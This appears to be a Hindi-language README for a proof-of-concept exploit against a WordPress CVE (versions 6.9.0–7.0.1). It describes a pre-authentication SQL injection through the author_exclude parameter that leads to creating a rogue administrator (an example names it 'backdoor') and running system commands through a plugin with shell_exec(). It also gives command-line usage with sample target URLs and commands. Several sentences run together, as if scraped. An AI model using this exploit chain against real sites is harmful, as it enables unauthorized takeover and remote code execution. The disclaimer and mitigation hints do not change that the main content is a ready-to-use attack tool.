
CVE-2026-63030 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, WordPress (संस्करण 6.9.0 से 7.0.1) में एक पूर्व-प्रमाणीकरण भेद्यता।
CVE-2026-63030 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, वर्डप्रेस (संस्करण 6.9.0 से 7.0.1) में एक प्री-ऑथेंटिकेशन कमजोरी। यह श्रृंखला बनाता है:
author_exclude पैरामीटर के माध्यम से SQL इंजेक्शनpython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
| Argument | Description |
|---|---|
--url | लक्ष्य WordPress रूट URL (आवश्यक) |
--username | बनाने के लिए व्यवस्थापक उपयोगकर्ता नाम (छोड़े जाने पर स्वतः उत्पन्न) |
--password | व्यवस्थापक पासवर्ड (छोड़े जाने पर स्वतः उत्पन्न) |
--email | व्यवस्थापक ईमेल (छोड़े जाने पर स्वतः उत्पन्न) |
--command, -c | प्लगइन के माध्यम से निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id) |
--post-id | एक प्रकाशित पोस्ट ID निर्दिष्ट करें (छोड़े जाने पर स्वतः पता लगाया जाएगा) |
--timeout | HTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 60) |
# यादृच्छिक व्यवस्थापक क्रेडेंशियल्स के साथ स्वतः एक्सप्लॉइट करें और 'id' चलाएं
python3 exploit.py --url http://192.168.1.100/wordpress/
# कस्टम व्यवस्थापक और कमांड
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude पैरामीटर के साथ एक तैयार बैच अनुरोध भेजता है, UNION क्वेरी को निष्पादित करने के लिए रूट कन्फ्यूज़न का शोषण करता है।shell_exec() के माध्यम से सिस्टम कमांड निष्पादित करता है।यह केवल एक प्रूफ-ऑफ-कॉन्सेप्ट है।
यह इसके लिए अभिप्रेत है:
उन प्रणालियों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं।
wp-config.php है, तो SQLi विफल हो सकता है।DISALLOW_FILE_MODS और DISALLOW_UNFILTERED_HTML को अक्षम करें।